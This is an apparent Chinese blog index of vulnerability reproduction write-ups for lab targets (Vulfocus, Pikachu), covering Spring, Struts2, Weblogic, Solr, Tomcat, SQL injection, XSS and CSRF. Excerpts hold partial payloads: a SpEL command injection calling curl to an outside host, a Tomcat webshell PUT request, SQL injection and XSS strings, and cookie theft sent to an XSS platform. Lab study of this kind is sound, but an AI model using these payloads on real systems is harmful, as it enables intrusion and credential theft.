![](https://img-blog.csdnimg.cn/20201014180756918.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
漏洞复现
文章平均质量分 62
00勇士王子
实迷途其未远,觉今是而昨非。
展开
-
[Vulfocus解题系列] Spring Cloud Gateway Actuator API SpEL表达式注入命令执行(CVE-2022-22947)
[Vulfocus解题系列] Spring Cloud Gateway Actuator API SpEL表达式注入命令执行(CVE-2022-22947)原创 2023-03-23 10:58:36 · 519 阅读 · 0 评论 -
Nacos未授权访问漏洞
一般来说,nacos被建议部署在内网中,如果在外网出现,会有很大的风险。原创 2023-02-27 11:20:30 · 6286 阅读 · 0 评论 -
[Vulfocus解题系列]fastjson1.2.24反序列化RCE (CVE-2017-18349)
前言Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。Fastjson 可以操作任何 Java 对象,即使是一些预先存在的没有源码的对象。Fastjson1.2.24版本爆出了第一个反序列化漏洞。第一个Fastjson反序列化漏洞爆出后,阿里在1.2.25版本设置了autoTypeSupport属性默认为false,并且增加了checkAutoType()函数,通过黑白名单的方式来防御Fastjson反序列化漏洞原创 2022-03-22 19:09:28 · 5705 阅读 · 0 评论 -
Springboot heapdump信息泄露漏洞
详细内容参考博客:https://www.cnblogs.com/snowie/p/15561081.html#12heapdump我这里遇到一个站,记录一下:发现heapdump泄露,下载文件使用工具进行分析,可以查找到datasource的密码,危害很大工具下载链接https://www.eclipse.org/mat/downloads.php最后漏洞定级为中级...原创 2022-02-18 14:47:00 · 8556 阅读 · 1 评论 -
[Vulfocus解题系列]pbootcms SQL注入 (CVE-2018-16356)
简介PbootCMS是一款使用PHP语言开发的开源企业建站内容管理系统(CMS)。 PbootCMS中存在SQL注入漏洞。该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。 后台路径:/admin.php 用户名密码:admin:123456 授权码自行获取:https://www.pbootcms.com/freesn/靶场搭建使用在线靶场http://vulfocus.fofa.so进入环境,发现需要获取授权码https://www.pboot原创 2022-01-12 16:21:06 · 7259 阅读 · 1 评论 -
[Vulfocus解题系列]skywalking SQL注入 (CVE-2020-9483)
描述Apache SkyWalking是美国阿帕奇软件(Apache Software)基金会的一款主要用于微服务、云原生和基于容器等环境的应用程序性能监视器。 当使用H2 / MySQL / TiDB作为Apache SkyWalking存储时,通过GraphQL协议查询元数据时,存在SQL注入漏洞,该漏洞允许访问未指定的数据。复现过程注:本次复现使用在线靶场http://vulfocus.fofa.so打开环境加上路径抓包 /graphql改成post,加上payload,利用报错注入原创 2022-01-12 15:30:43 · 3736 阅读 · 3 评论 -
[Vulfocus解题系列]Apache Solr 远程命令执行漏洞(CVE-2019-0193)
介绍Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。此次漏洞出现在Apache Solr的DataImportHandler,该模块是一个可选但常用的模块,用于从数据库和其他源中提取数据。它具有一个功能,其中所有的DIH配置都可以通过外部请求的dataConfig参数来设置。由于DIH配置可以包含脚本,因此攻击者可以通过构造危险的请求,从而造成远程命令执行。靶场搭建进入指定漏洞路径,执行命令docker-c原创 2022-01-06 17:57:54 · 872 阅读 · 0 评论 -
[Vulfocus解题系列]spring 代码执行 (CVE-2018-1273)
简介Spring Expression Language是一个功能强大的表达式 语言支持查询和在运行时操作一个对象图。 攻击者可以在未获得授权的情况下,将精心制作的请求参数注入到存在该漏洞的服务器上,从而发起远程代码执行攻击。复现过程使用在线靶场抓包改包,将data数据改为下面的payloadusername[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("curl http://m9c5f3.ceye.io/原创 2022-01-05 15:59:47 · 3235 阅读 · 0 评论 -
[Vulfocus解题系列] Apache Solr 远程命令执行漏洞(CVE-2017-12629)
介绍影响版本Apache Solr 5.5.0到7.0.1版本复现过程docker搭建 Apache Solr 环境burp抓包改包POST /solr/demo/config HTTP/1.1Host:ip:8983User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Accept: text/html,application/xhtml+xml,appli原创 2022-01-05 14:46:39 · 2223 阅读 · 0 评论 -
[Vulfocus解题系列]Tomcat 远程代码执行漏洞(CVE-2017-12615)
介绍Tomcat 是一个小型的轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被普遍使用,是开发和调试JSP 程序的首选。 攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 的webshell文件,JSP文件中的恶意代码将能被服务器执行,导致服务器上的数据泄露或获取服务器权限。复现过程访问根路径burp抓包修改第一行为PUT和增加POST请求体,修改后为PUT /shell.jsp/ HTTP/1.1Host: vulfocus.fofa.so:5原创 2022-01-03 21:03:01 · 1663 阅读 · 0 评论 -
[Vulfocus解题系列]weblogic 反序列化(CVE-2017-10271)
介绍Oracle Fusion Middleware(Oracle融合中间件)是美国甲骨文(Oracle)公司的一套面向企业和云环境的业务创新平台。该平台提供了中间件、软件集合等功能。Oracle WebLogic Server是其中的一个适用于云环境和传统环境的应用服务器组件。 Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。攻击者发送精心构造的xml数据甚至能通原创 2022-01-02 21:39:47 · 1853 阅读 · 0 评论 -
记一次CLTPHP渗透测试
前言本人使用的是本地搭建的CLTPHP5.5版本,请自行搭建。测试漏洞类型:任意文件删除漏洞、任意文件下载漏洞、文件上传漏洞渗透测试过程搭建好了之后是这个效果路径加admin进入后台登录页面因为主要是网站后台进行测试,所以我直接使用admin账号密码登录进去,搭建网站的时候看了一下,默认的admin密码是admin123成功进入后台首先看到一个可以删除sql文件的地方,可能存在任意文件删除漏洞burp抓个包看一下构造很明显,直接是sql文件的名字然后我直接在本地新建了一个66原创 2021-11-21 12:15:10 · 3615 阅读 · 1 评论 -
【封神台】cookie伪造目标权限
题目解题过程访问网站,是一个留言板先用普通的xss测试一下成功弹窗,说明地处存在xss漏洞选择一个在线的xss平台,创建项目后输入平台的xss代码(我随便在网上找了一个xss平台如下:https://xss8.cc)原理就是当管理员查看留言页面时触发xss,将管理员的cookie发送到该平台上面,从而实现利用管理员的cookie进行伪造目标权限因为xss bot 每10秒访问一次页面,相当于管理员每10秒看一次留言,触发一次xss代码,所以在10秒后,xss平台接收到了目标的coo原创 2021-11-17 14:56:05 · 664 阅读 · 0 评论 -
[Vulfocus解题系列] phpmyadmin SQL注入 (CVE-2020-5504)
漏洞介绍名称: phpmyadmin SQL注入 (CVE-2020-5504)描述: phpMyAdmin是Phpmyadmin团队的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。 在用户帐户页面中发现了一个SQL注入漏洞。创建对此页面的查询时,恶意用户可能会注入自定义SQL来代替其自己的用户名。攻击者必须具有有效的MySQL帐户才能访问服务器。解题过程1.访问题目环境,因为这个漏洞是phpmyadmin的后台漏洞,原创 2021-10-01 18:17:29 · 3789 阅读 · 2 评论 -
xss-challenge-tour(XSS靶场)1-10
第一关第一关是最简单的,什么限制都没有,直接上最普通的xss代码实现弹窗<script>alert(‘xss’)</script>payload<script>alert('xss')</script>第二关直接输入第一关的代码,没有弹窗,F12看一下代码,尝试进行闭合下面是包含我们之前输入的内容的代码<input name="keyword" value="<script>alert(/xss/)</scr.原创 2021-09-06 22:29:52 · 858 阅读 · 2 评论 -
Victor CMS 未授权sql注入(CVE-2020-29280)
漏洞名称Victor CMS 未授权sql注入漏洞等级高危爆发时间2020-11-27漏洞简介Victor CMS是一个简单的内容管理系统。Victor CMS存在SQL注入漏洞。攻击者可利用漏洞获取数据库敏感信息。影响版本The Victor CMS v1.0漏洞复现这里用的是云演的在线环境,这个漏洞的环境是免费的打开漏洞环境,根据漏洞描述,漏洞应该存在于search搜索框用burp抓搜索框的包,发现是传入的是post参数search单引号报错加上注释后页面返回正常原创 2021-08-08 17:55:36 · 757 阅读 · 0 评论 -
[Pikachu靶场实战系列]RCE(远程系统命令执行)
RCE介绍exec “ping”可以输入一个ip地址,结果发现页面无回显,难道不应该回显Ping命令的结果吗,不过我们不管他,继续下一步。在ip后用&分割再输入一个ls命令,发现ls命令被执行了说明开发者没有做严格的安全控制,没有想到我们会多输入一个命令。可以随意执行命令,危害性是很大的。...原创 2021-08-06 19:02:02 · 330 阅读 · 0 评论 -
[Pikachu靶场实战系列] SQL注入(宽字节注入)
宽字节注入原理在数据库中使用了宽字符集(GBK,GB2312等),除了英文都是一个字符占两字节;MySQL在使用GBK编码的时候,会认为两个字符为一个汉字(ascii>128才能达到汉字范围);在PHP中使用addslashes函数的时候,会对单引号%27进行转义,在前边加一个反斜杠”\”,变成%5c%27;可以在前边添加%df,形成%df%5c%27,而数据进入数据库中时前边的%df%5c两字节会被当成一个汉字;%5c被吃掉了,单引号由此逃逸可以用来闭合语句。使用PHP函数iconv(‘原创 2021-08-01 11:12:06 · 3416 阅读 · 2 评论 -
[Pikachu靶场实战系列] SQL注入(盲注)
目录盲注布尔盲注时间盲注盲注盲注的意思就是说页面没有明显的回显,我们只能通过其他方式判断注入点。常见的方式有两种,一种是布尔盲注,通过页面返回的不同状态判断语句是否被执行。另一种是时间盲注,通过页面加载时间来判断语句是否被执行。布尔盲注先输入一个之前关卡中的名字,返回正常加上单引号,并没有报错,而是返回了我输入的信息不存在加上注释符号后,返回又正常了,说明注入点存在,且就是单引号闭合判断数据库名的长度lucy’and length(database())>=1 #l原创 2021-07-29 19:32:33 · 3238 阅读 · 0 评论 -
[Pikachu靶场实战系列] SQL注入(delete注入/http头注入)
delete是删除的意思,我们肯定要有东西删,先随便输入一些留言。点击删除抓包在get数据中发现参数id,猜测id就是注入点,id参数后加单引号,报错了,说明注入点找对了构建pyload (+的作用是代替空格)56+or+updatexml(1,concat(0x7e,database()),0)注意:1.以下pyload在burp中需要使用Ctrl+U进行编码才能生效2.和之前的一样,查询数据长度为31,所以要想将数据全部查询出来需要多次查询并拼接,我这里每次查询一次,不再拼.原创 2021-07-28 20:10:25 · 741 阅读 · 0 评论 -
[Pikachu靶场实战系列] SQL注入(insert/update注入)
insert注入发现有个注册页面,注册页面如果有注入漏洞的话,一般是insert类型的,因为注册相当于往数据库的表中插入一行新数据填写注册信息,然后抓个包,可以看到时post形式传输的数据尝试在admiin后加单引号,报错了而且报错信息中没有出现admiin,可能是单引号完成闭合了,最后还需要加个)完成闭合添加其他参数和)构建闭合username=admiin’,‘111’,‘222’,‘333’,‘444’,‘555’)#构建好闭合了,但是这个注册页面是没有回显的,怎样查询数据呢,原创 2021-07-28 18:14:29 · 3573 阅读 · 0 评论 -
[Pikachu靶场实战系列] SQL注入
SQL注入概述数字型注入(post)随便选择一个进行抓包可以看出,传入的值赋值给了参数id.因为是数字型注入,我们在1后面加上一个单引号看是否报错报错了,确定漏洞存在id=1 or 1 #可以把所有列表爆出来,因为1为真,符合所有条件,所以输出了所有的用户order by 判断字段长度order by 2 正常,order by 3 报错,说明字段长度为2然后union select 进行联合查询,右边的1和2就是回显查询结果的地方先查一下数据库,将结果回显到2的地原创 2021-07-25 21:42:32 · 359 阅读 · 0 评论 -
[Pikachu靶场实战系列] CSRF(跨站请求伪造)
CSRF概述Cross-site request forgery 简称为“CSRF”,在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击就完成了。所以CSRF攻击也成为"one click"攻击。CSRF(get)打开右边的提示,告诉我们有这么多用户,密码都是123456,我们要验证CSRF的存在,只需要让一个用户登录后点击构造好的url,然后自动修改个人信息。首先先登录vince用户修改个人信息将信息全改成1,原创 2021-07-19 17:53:59 · 325 阅读 · 0 评论 -
[Vulfocus解题系列] yapi 代码执行
漏洞介绍名称: yapi 代码执行描述: API接口管理平台是国内某旅行网站的大前端技术中心开源项目,使用mock数据/脚本作为中间交互层,为前端后台开发与测试人员提供更优雅的接口管理服务,该系统被国内较多知名互联网企业所采用。 YApi 是高效、易用、功能强大的 api 管理平台。但因为大量用户使用 YAPI的默认配置并允许从外部网络访问 YApi服务,导致攻击者注册用户后,即可通过 Mock功能远程执行任意代码。解题过程1.打开靶场页面,进入注册页面,随意注册一个用户2.注册后进入如下页面原创 2021-07-18 16:37:53 · 1010 阅读 · 1 评论 -
[Pikachu靶场实战系列] XSS(跨站脚本漏洞)
XSS(跨站脚本)概述 Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类型:1.反射性XSS;2.存储型XSS;3.DOM型XSS; XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWASP TOP10的排名中一直属于前三的江湖地位 XSS是一种发生在前端浏览器端的漏洞,所以其危害的对象也是前端用户。 形成XSS漏洞的主要原因是程序对输入和输出没有做合适的处理,导致“原创 2021-07-18 16:03:31 · 407 阅读 · 2 评论 -
[Pikachu靶场实战系列] 暴力破解
一、靶场介绍GitHub:https://github.com/zhuifengshaonianhanlu/pikachu这里推荐一个在线的靶场网站 谜团靶场,里面有很多的在线靶场,其中就包括了Pikachu靶场,只需要点击启动环境,就可以开始靶场的练习,方便快捷暴力破解基于表单的暴力破解1.输入admin admin2.打开burp点击Login进行抓包3.右键发送数据包到Intruder模块4.进入到Intruder模块的Positions模块中,先点击clear清除数据包中自动标原创 2021-07-17 16:56:00 · 639 阅读 · 0 评论 -
[Vulfocus解题系列] druid 远程命令执行 (CVE-2021-25646)
漏洞介绍名称: druid 远程命令执行 (CVE-2021-25646)描述: Apache Druid 是用Java编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。 Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中,默认已被禁用。但是,在Druid 0.20.0及更低版本中,经过身份验证的用户发送恶意请求,利用Apache Druid漏洞可以执行任意代码。影响版本Apache Dru原创 2021-07-16 11:11:57 · 1293 阅读 · 2 评论 -
[Vulfocus解题系列] phpunit 远程代码执行 (CVE-2017-9841)
漏洞介绍名称: phpunit 远程代码执行 (CVE-2017-9841)描述: PHPUnit 是 PHP 程式语言中最常见的单元测试 (unit testing) 框架。 通常phpunit使用composer非常流行的PHP依赖管理器进行部署,将会在当前目录创建一个vendor文件夹.phpunit生产环境中仍然安装了它,如果该编写器模块存在于Web可访问目录,则存在远程代码执行漏洞。漏洞版本PHPUnit 4.8.19 ~ 4.8.27PHPUnit 5.0.10 ~ 5.6.2解题过原创 2021-07-16 10:42:51 · 854 阅读 · 0 评论 -
[Vulfocus解题系列] weblogic 远程代码执行 (CVE-2019-2729)
漏洞介绍解题过程1.访问靶场2.漏洞存在于:_async/AsyncResponseService,访问地址可以访问则存在漏洞3.使用burp抓包然后构造payload发送到服务器,使服务器执行命令执行id命令执行whoami 命令执行ls /tmp 命令,没有返回结果POC...原创 2021-07-15 19:44:37 · 1834 阅读 · 1 评论 -
[Vulfocus解题系列] weblogic 远程代码执行 (CVE-2019-2725)
漏洞介绍名称: weblogic 远程代码执行 (CVE-2019-2725)描述: Oracle WebLogic Server是美国甲骨文(Oracle)公司的一款适用于云环境和传统环境的应用服务中间件,它提供了一个现代轻型开发平台,支持应用从开发到生产的整个生命周期管理,并简化了应用的部署和管理。 由于在反序列化处理输入信息的过程中存在缺陷,未经授权的攻击者可以发送精心构造的恶意 HTTP 请求,利用该漏洞获取服务器权限,实现远程代码执行。解题过程1.访问靶场2.漏洞存在于:_async/原创 2021-07-15 16:02:57 · 806 阅读 · 0 评论 -
[Vulfocus解题系列] 所复现漏洞总结
前言写[Vulfocus解题系列]也有十天左右了,感觉虽然复现了一些漏洞,但是复现过后对这些漏洞的印象并不深刻,于是就有了写一篇总结篇的想法。把复现过的漏洞介绍、特征什么的总结过来,没事的时候看一看,加深一些印象,别之后别人闻起来某个漏洞,明明复现过,却忘了,那多不好意思。已复现的Vulfocus靶场漏洞Struts2-052远程代码执行(CVE-2017-9805)描述: Apache Struts是美国阿帕奇(Apache)软件基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源原创 2021-07-14 10:36:20 · 13631 阅读 · 1 评论 -
[Vulfocus解题系列] Struts2-052远程代码执行漏洞(CVE-2017-9805)
漏洞介绍名称: struts2-052 远程代码执行 (CVE-2017-9805)描述: Apache Struts是美国阿帕奇(Apache)软件基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。REST plugin是其中的一个处理传入URL请求的插件。 攻击者可以通过构造恶意XML请求在目标服务器上远程执行任意代码。漏洞的成因是由于使用XStreamHandler反序列化XStream实例的时候没有执行严原创 2021-07-14 09:41:52 · 2232 阅读 · 1 评论 -
[Vulfocus解题系列] Spring 目录遍历 (CVE-2020-5410 )
漏洞介绍名称: Spring 目录遍历 (CVE-2020-5410 )描述: Spring Cloud Config是美国威睿(VMware)公司的一套分布式系统的配置管理解决方案。该产品主要为分布式系统中的外部配置提供服务器和客户端支持。 Spring Cloud Config,2.2.3之前的2.2.x版本,2.1.9之前的2.1.x版本以及较旧的不受支持的版本允许应用程序通过spring-cloud-config-server模块提供任意配置文件。恶意用户或攻击者可以使用特制URL发送请求,这可原创 2021-07-13 21:13:18 · 2461 阅读 · 0 评论 -
[Vulfocus解题系列] nexus 远程代码执行 (CVE-2020-10199/10204)
漏洞介绍名称: nexus 远程代码执行 (CVE-2020-10199/10204)描述: Nexus Repository Manager(NXRM)是美国Sonatype公司的一款Maven仓库管理器。 CVE-2020-10199的漏洞需要普通用户权限即可触发,而CVE-2020-10204则需要管理员权限。两个漏洞的触发原因均是不安全的执行EL表达式导致的.解题过程1.打开靶场2.登录 弱口令 admin/admin2.抓包获取登录后的cookie及scrf属性;...原创 2021-07-13 14:51:26 · 1393 阅读 · 6 评论 -
[Vulfocus解题系列] struts2-046 远程代码执行 (CVE-2017-5638)
漏洞介绍名称: struts2-046 远程代码执行 (CVE-2017-5638)描述: Apache Struts是美国阿帕奇(Apache)软件基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。 攻击者可以将恶意代码放入http报文头部的Content-Disposition的filename字段,通 过不恰当的filename字段或者大小超过2G的Content-Length字段来触发异常,进而导致任意代原创 2021-07-12 16:21:01 · 1165 阅读 · 0 评论 -
[Vulfocus解题系列]struts2-048 远程代码执行 (CVE-2017-9791)
漏洞介绍名称: struts2-048 远程代码执行 (CVE-2017-9791)描述: Apache Struts是美国阿帕奇(Apache)软件基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。 当Struts 2中的Struts 1插件启用的情况下,攻击者通过构造恶意字段可以造成RCE解题过程1.打开靶场环境2.访问漏洞存在的路径 /integration/saveGangster.actio原创 2021-07-11 21:12:50 · 1043 阅读 · 3 评论 -
[Vulfocus解题系列] CouchDB垂直越权漏洞(CVE-2017-12635)
漏洞介绍解题过程1.打开题目环境2.使用nc监听端口,用于接收漏洞环境的反弹Shell3.原创 2021-07-11 17:20:36 · 721 阅读 · 1 评论 -
[Vulfocus解题系列] jboss 反序列化 (CVE-2017-7504)
漏洞介绍名称: jboss 反序列化 (CVE-2017-7504)描述: Red Hat JBoss Application Server(AS,也称WildFly)是美国红帽(Red Hat)公司的一款基于JavaEE的开源的应用服务器,它具有启动超快、轻量、模块化设计、热部署和并行部署、简洁管理、域管理及第一类元件等特性。 Jboss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件原创 2021-07-11 14:10:36 · 1057 阅读 · 1 评论 -
[Vulfocus解题系列] jboss 反序列化 (CVE-2017-12149)
漏洞介绍名称: jboss 反序列化 (CVE-2017-12149)描述: Red Hat JBoss Enterprise Application Platform(EAP)是美国红帽(Red Hat)公司的一套开源、基于J2EE的中间件平台。该平台主要用于构建、部署和托管Java应用程序与服务。Jboss Application Server是其中的一款基于JavaEE的开源的应用服务器。 该漏洞位于JBoss的HttpInvoker组件中的 ReadOnlyAccessFilter 过滤器中,其原创 2021-07-10 20:57:03 · 705 阅读 · 1 评论 -
[Vulfocus解题系列] phpcgi 代码执行 (CVE-2012-1823)
漏洞介绍名称: phpcgi 代码执行 (CVE-2012-1823)描述: CGI全称是“通用网关接口”(Common Gateway Interface), 它可以让一个客户端,从网页浏览器向执行在Web服务器上的程序请求数据 这个漏洞简单来说,就是用户请求的querystring(querystring字面上的意思就是查询字符串,一般是对http请求所带的数据进行解析,这里也是只http请求中所带的数据)被作为了php-cgi的参数,最终导致了一系列结果。解题过程1.打开靶场环境2.访问i原创 2021-07-09 17:21:07 · 630 阅读 · 3 评论